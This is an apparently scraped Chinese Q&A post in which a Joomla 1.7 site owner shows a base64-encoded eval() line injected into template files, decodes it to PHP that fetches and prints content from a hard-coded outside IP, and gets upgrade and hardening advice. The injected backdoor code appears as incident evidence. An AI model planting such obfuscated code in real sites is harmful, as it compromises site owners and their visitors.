php-网站后门和eval()
作者:互联网
我正在运行一个今天被黑客入侵的Joomla 1.7网站.下面的脚本做了黑客.
eval((base64_decode("DQoNCnByaW50IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgvaGxpbmtzL2xpbmtzLnBocD91YT0nIC4gQHVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pIC4gJyZyZXE9JyAuIEB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJy8nIC4gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pKTsNCg0K")));
上面的行被注入到我的templates文件夹的index.php文件中.该文件夹中的每个模板都具有上面的代码.在每个文件中重复了几次.
当我解码代码时,它输出
print @file_get_contents('http://93.115.86.168/hlinks/links.php?ua=' . @urlencode($_SERVER['HTTP_USER_AGENT']) . '&req=' . @urlencode($_SERVER['HTTP_HOST'] . '/' . $_SERVER['REQUEST_URI']));
我删除了脚本,站点恰好可以正常工作.脚本没有做任何不好的事情,只是站点根本没有加载.
我的问题是,即使我将文件许可权设置为644,将文件夹许可权设置为755,这怎么可能?
我如何找出导致问题的原因?我应该采取什么措施来防止将来发生这种情况?
更新
这个Forum Post Assistant / FPA非常有帮助
解决方法:
怎么样,因为您正在运行Joomla 1.7网站?自Joomla发行以来,它不再受Joomla 1.7的支持,并且已在其中添加了一些安全修复程序.您应该立即升级到2.5.9.应该没有向后兼容性问题,因为2.5.9只是Joomla 1.7的长期支持版本.
按照Joomla安全清单here中的建议检查PHP设置.确保您的PHP和MYSQL版本是最新的(至少PHP 5.3.x-优选5.4.x和MYSQL至少5.0.4).
最后,确保您所有的扩展程序都是最新的.开发人员再次不断地更新模块,不仅增加新功能,而且增加附加/改进的安全性或防止发现的漏洞!
另外,请不要像史蒂文所说的那样打开allow_url_fopen,这将导致Joomla的一键式更新无法正常工作.
标签:joomla,joomla1-7,php 来源: https://codeday.me/bug/20191031/1974200.html